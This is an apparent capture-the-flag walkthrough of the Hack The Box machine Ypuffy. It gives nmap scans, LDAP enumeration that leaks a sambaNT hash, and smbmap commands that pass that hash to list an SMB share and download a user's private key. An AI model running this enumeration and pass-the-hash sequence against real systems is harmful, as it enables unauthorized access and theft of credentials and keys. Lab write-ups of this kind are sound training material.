- nmap
- Add
ypuffy.htb
to the hosts file so we can refer to the host by name$ echo "10.10.10.107 ypuffy.htb" >> /etc/hosts
- Scan for ports and services
# Use nmap to find available TCP ports quickly $ ypuffy_tcp_ports=$( \ nmap ypuffy.htb \ -p- \ --min-rate=1000 \ -T4 \ | grep ^[0-9] \ | cut -d '/' -f 1 \ | tr '\n' ',' \ | sed s/,$// \ ) # Scan found ports for services $ nmap ypuffy.htb \ -p ${ypuffy_tcp_ports} \ -sV \ -sC \ -T4 \ -oA nmap-tcp-foundports
- Use nmap NSE script to determine basic LDAP info
$ nmap ypuffy.htb \ --port 389 \ --script ldap-rootdse \ -Pn ... PORT STATE SERVICE 389/tcp open ldap | ldap-rootdse: | LDAP Results | <ROOT> | supportedLDAPVersion: 3 | namingContexts: dc=hackthebox,dc=htb | supportedExtension: 1.3.6.1.4.1.1466.20037 |_ subschemaSubentry: cn=schema ...
- Now use nmap to do a full LDAP search
$ nmap ypuffy.htb \ --port 389 \ --script ldap-search \ -Pn
- You can also use ldapsearch to perform the same LDAP search as the nmap
ldap-search
NSE script$ ldapsearch -h ypuffy.htb \ -x \ -s sub \ -b "dc=hackthebox,dc=htb"
We found a sambaNT password hash in the LDAP search output above. Let's see if it gets us anywhere with SMB.
- Use smbmap and the sambaNT hash we found to enumerate SMB with alice1978 creds
# Notice how the hash is pasted twice into the password field, with a colo separator. $ smbmap -H ypuffy.htb \ -u alice1978 \ -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' [+] Finding open SMB ports.... [+] Hash detected, using pass-the-hash to authentiate [+] User session establishd on ypuffy.htb... [+] IP: ypuffy.htb:445 Name: ypuffy.htb Disk Permissions ---- ----------- alice READ, WRITE IPC$ NO ACCESS
- Add the
-R
flag to recursively list the contents of directories in the share(s) to which alice1978 has access$ smbmap -H ypuffy.htb \ -u alice1978 \ -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \ -R [+] Finding open SMB ports.... [+] Hash detected, using pass-the-hash to authentiate [+] User session establishd on ypuffy.htb... [+] IP: ypuffy.htb:445 Name: ypuffy.htb Disk Permissions ---- ----------- alice READ, WRITE .\ dr--r--r-- 0 Wed Jun 5 14:07:31 2019 . dr--r--r-- 0 Tue Jul 31 20:16:50 2018 .. -r--r--r-- 1460 Mon Jul 16 18:38:51 2018 my_private_key.ppk IPC$ NO ACCESS
- Let's download that private key file using the
--download
option ofsmbmap
$ smbmap -H ypuffy.htb \ -u alice1978 \ -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \ --download alice/my_private_key.ppk [+] Finding open SMB ports.... [+] Hash detected, using pass-the-hash to authentiate [+] User session establishd on ypuffy.htb... [+] Starting download: alice\my_private_key.ppk (1460 bytes) [+] File output to: /lsec/HtB/Machines/Ypuffy/ypuffy.htb-alice_my_private_key.ppk